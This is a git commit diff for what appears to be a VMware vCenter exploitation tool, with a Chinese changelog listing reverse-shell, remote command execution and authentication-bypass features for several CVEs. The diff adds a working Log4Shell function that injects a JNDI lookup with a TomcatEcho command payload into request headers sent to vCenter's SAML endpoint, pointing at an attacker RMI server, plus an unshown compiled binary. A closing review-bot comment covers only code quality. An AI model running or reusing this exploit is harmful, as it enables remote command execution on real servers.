bug fix
root committed Oct 10, 2022
1 parent 15e84a6 commit 90ef77b
Showing 3 changed files with 42 additions and 2 deletions.
1 change: 1 addition & 0 deletions README.md
Expand Up @@ -68,6 +68,7 @@ V1.0 上线
V1.1 针对CVE-2021-21985添加了利用rmi反弹shell的功能,前提是你要启动一个rmi服务器,例如jndi-injection-exploit
V1.2 增加了针对Vcenter的log4j检测和验证能力
V1.3 增加了对Vmware WorkSpace One Access的漏洞验证功能,包括CVE-2022-22954 远程命令执行;CVE-2022-22972、CVE-2022-31656身份鉴别绕过
V1.3.1 修复了检测log4j时忽略了端口的问题,有的服务会更改默认的443端口
...
```

Binary file added main.exe
Binary file not shown.
43 changes: 41 additions & 2 deletions src/log4jcenter/log4j.go
Expand Up @@ -74,7 +74,7 @@ func firstCheck(data []byte) bool {
func StartScan(url string) {
wg.Add(1)
go rmiServer()
check_alive(url)
// check_alive(url)
target := strings.TrimLeft(url, "https://")
local_ip := getIpAddr2(target)
fmt.Println("[*] your local IP: " + local_ip)
Expand Down Expand Up @@ -127,8 +127,47 @@ func exploit(url, rmiserver string) {

}

func exec_cmd(url, rmiserver, command string) {
host := rmiserver
client := req.C()
client.EnableForceHTTP1()
client.EnableInsecureSkipVerify()
client.SetTimeout(2 * time.Second)
// client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403
rmi_server := fmt.Sprintf("${jndi:%s}", host)
myheader := map[string]string{
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"X-Forwarded-For": rmi_server,
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"Cmd": rmi_server + "/TomcatBypass/TomcatEcho",
}

client.R().
SetHeaders(myheader).
Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=")

}

func getIpAddr2(url string) string {
conn, err := net.Dial("tcp", url+":443")

tmp := strings.Split(url, ":")
port := ""
ipaddr := ""
if len(tmp) > 1 {
ipaddr = tmp[0]
port = tmp[1]
} else {
ipaddr = url
port = "443"
}
fmt.Println(port)
conn, err := net.Dial("tcp", ipaddr+":"+port)
if err != nil {
fmt.Println(err)
return ""
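Review bot: The new host/port split in getIpAddr2 uses `strings.Split(url, ":")` and reads only the first two fields, so a bracketed IPv6 literal or a value that still carries a path (for example `host:8443/ui`) produces a wrong address and the dial fails. `net.SplitHostPort(url)` with a fallback to port 443 on error, rejoined with `net.JoinHostPort(host, port)`, covers those inputs. The argument comes from `strings.TrimLeft(url, "https://")` in StartScan, which treats its second argument as a character set and therefore also strips a leading `h`, `t`, `p` or `s` from the hostname; `strings.TrimPrefix` is presumably what was intended. `fmt.Println(port)` looks like leftover debug output, and the body of getIpAddr2 continues past the end of the hunk.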
